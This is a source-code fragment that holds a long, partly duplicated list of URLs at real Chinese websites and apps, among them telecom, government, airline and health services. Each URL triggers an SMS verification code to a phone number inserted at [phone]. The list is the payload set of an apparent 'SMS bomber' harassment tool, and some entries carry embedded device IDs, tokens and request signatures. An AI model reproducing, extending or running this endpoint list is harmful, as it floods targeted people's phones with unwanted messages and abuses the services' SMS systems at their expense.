"https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8%2C1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=%2B86-[phone]&net=wifi&", + "http://i.vaakwe.com/user/reg_send_code.php?mobile=[phone]&country=0086&udid=a884f6c7f15ff08a97ab16e4d33fe2c216a9ebed&imei=02:00:00:00:00:00&mac=02:00:00:00:00:00&imsi=02:00:00:00:00:00&token=ba4edbf30bc5363ba02875fc4c6b25c8a21ed8a99e21c5c40ff6385c43c71c8b&type=sms&", + "http://tel.kuaishang.cn/ajax.php?act=sendmsg&author=%E9%BD%90%E6%99%A8&fromurls=http%3A%2F%2Fwww.mianfeidianhua.net%2Fhsnzy.html&content=%E6%83%B3%E5%92%A8%E8%AF%A2%E3%80%82&did=382&uid=2010131726&phone=[phone]&_=1551173567919", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone 6S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]&platform=iOS&token=&userId=-1&version_code=110", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", + "http://kyddn.log56.com/sq_server/verifyCode.action?mobile_no=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://m.business-steward.com/ticket/application/message/send_msg.php?tel=[phone]&type=forget", + "http://splus.bianfeng.com/index.php?r=findAccount/SendCode&rnd=&a=[phone]", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://app.zhigoukeji.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://m.business-steward.com/ticket/application/message/send_msg.php?tel=[phone]&type=forget", + "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]&PUBLIC_SERVICE_TYPE=0&hospitalID=&isRead=1&loc=c&", + "http://bank.wo.cn/wxun/api/my/getSmsCode?mobile=[phone]", + "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", + "https://cloud.maitao.com/auth/code?cityId=2&uid=&cfbundleversion=5.12.0&imei=32E30496-2A31-463B-A1BD-75B005303E41&channelid=AppStore&devicetoken=69103da60f6eca7a15a995f4f33371ce6413567d5df01d1335f6ab25a47a2f3c&fromapp=1&token=05F452E3F79B7410AC8962C7445483E81AD2ACC", + "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", + "http://i.zhaopin.com/Login/LoginApi/SendBindSms?jsoncallback=jQuery16402676061029242586_1454143948438&businessType=C-Bind&t=1454143948656&_=1454143948656&mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]&token=f3c95f20b6628ae17a40111ebf4170e8", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "http://www.imdxd.com/api/method/getCode?phone=[phone]&type=2", + "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]&refer=hometabpage&sid=appstore&sign=dfe50ccd14bb2c905e37b4706c5e633c&tcid=5f401e59cddf4345a511010d2c268592&timestamp=1", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://m.mgqr.com:443/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://m.mgqr.com:443/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%23%2Fuser%2Flogin&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%2", + "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", + "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", + "http://passport.ks5u.com/RPAjax.ashx?Param=009&PhoneNum=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", + "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://api.wanwudezhi.com/module-user/api/v1/user/sendSmsCode?phone=[phone]", + "http://www.gangaimall.com/mbb-web/api/account/code?mobile=[phone]&type=0", + "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]&code=&isSupportSession=1&src=ios&token=5d3fa06f6d96f74c953459ba&ver=5.1.2", + "http://mobile.health.pingan.com:80/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567991", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://appsource.taohv.cc/user/sendRegisterCode.php?version_android=4.1.9&channel_android=lianxiang&mobile=[phone]&code=&sign=21119a7fa9bbb06b6470ce49db996711", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", + "http://reg.uuyoyo.com/AshxHandler/AjaxRegHandler.ashx?action=reg_phone_code_send&_=&phone=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://msg.106117.com/submit_ajax.ashx?callback=jQuery11120017795995642418072_1558097551516&username=[phone]&action=getValidate&_=1558097551517", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "https://iosapi.shixiseng.com/app/telrandcode?sign=6F4C6784400B289D3B0BC2742D704E59&tel=[phone]&time=1564926500.453583&type=reg", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]&nation=CN&type=0&format=json&guid=56fa5d7a032a8190dd9844ebaa211181&partner=237b12de4c48eacec5a368eb192c3c5e&productname=51job&uuid=e7ab248c2ba73cb851a1eb31aa138695&version=869", + "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=103", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", + "http://slb-sport.vesal.cn:80/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", + "http://www.zkzcfu.cn/api/sms/send?mobile=[phone]&event=register", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]&request_ts=1564116332", + "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App%20Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]&appId=ios_15196397349756&t=1565073179646&sign=70723c9c61730237de0b97a02395e103", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]&sign=FB3ED4C94F2877A29366F19C4A7CED68", + "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", + "https://plus-api.kankan.com/user/login/sms?from=IOS&mobile=[phone]&sign=b41e46a3446472eaca2c0d0618eb7abd&terminal=IOS", + "https://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]&_=1590559098473", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", + "https://couple-api.jizhangapp.com/login/captcha/[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://b.hongkedou.com/phoneVerifyCode/getVerificationCode?phone=[phone]&business=buyer-register", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://activity.renren.com:80/livecell/ajax/tryVerify?sanbox=a&phoneNum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]", + "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://m.rong360.com/mobile/Wxpageforapp/SendSmsVcode?mobile=[phone]&callback=rong_json1565594522310&v=7620", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", + "http://gw.dianzuanmao.com/user/getCsbCode?phone=[phone]&type=1", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]&app_id=29&_=1580993309093", + "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]&sign=20f2f798a813a8115f5a837c7cad140b&timestamp=1566033453", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", + "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]&operation=login&request_token=RT-946987-zwaBUfZnSTD2qfrc04fvX9J2Pd7AyN-bignox.com", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://weizhang.58.com/user/login/getcode?mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=%E9%87%8D%E5%BA%86%E5%B8%82&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", + "http://wx.cq3g.cn/shop/sendSmsCode?phone=[phone]", + "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", + "http://m.yhk188.com/register/sendAppRegMsg.dos?channel=1&mobilephone=[phone]&time=8a0aae56fd56e3d023102a88e57a4a594a1625c5769a666d42a35e5b5933c01b&type=1&version=1.6.1", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://m.edaogou.mobi/appweb/user.ashx?act=sendCode&typ=register&mobile=[phone]&_=1551173567948", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", + "http://api.passport.pptv.com:80/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", + "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://passport.58.com/mobileauthcodelogin/getcode?validatecode=?=true&source=m-my&callback=jsonp_callback2&mobile=[phone]", + "http://www.zuisgo.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&firewallToken=jkjslfskjk8545sfsdf&uid=&token=&loginTime=&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", + "http://www.maimaishichang.com/m/reg/motregchk.php?mob=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", + "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", + "http://app.zhigoukeji.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", + "http://api.sssc.cn/seccode/reg?callback=&m=[phone]", + "http://www.faka866.com/index/checkuser?Mobile=[phone]&act=sj_reg_telma&t=1589617288409", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]&refer=hometabpage&sid=appstore&sign=dfe50ccd14bb2c905e37b4706c5e633c&tcid=5f401e59cddf4345a511010d2c268592&timestamp=1", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]&unique=1&areaCode=86", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]&_=1506486656411", + "http://www.id68.cn/member/common/ckuser/ m=mobile&a=isMobile&format=ajax&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", + "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]&type=1&token=YzVkMGVlYWMtZTU4My00MTc2LWJkMzYtZGZlMWRjODgwYjBkZDBiMDg4Y2QxZWZkLTYzZGItNjcxNC0zODVlLWNhZWUwZDVj", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]&yzm=148323267", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://w.xyhsoft.com:80/pypay/xyhpay/util/ZsendCode.do?phone=[phone]", + "http://wap.zt.raiyi.com/weixin/bind/verifyMobile?mobile=[phone]&appCode=fc_wx&buyChannel=OfficialAccounts&vtype=0", + "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?publishid=1003&deviceId=2808ec7ef7fbeed6&df=android&vt=5&screen=1080x1920&deviceid=2808ec7ef7fbeed6&proid=qknode&os=android&av=NMF26X&appVersion=1.4.0&imei=865499038835144&ov=7.1.1&osVersion=7.1.1&osLevel=25&phone=[phone]", + 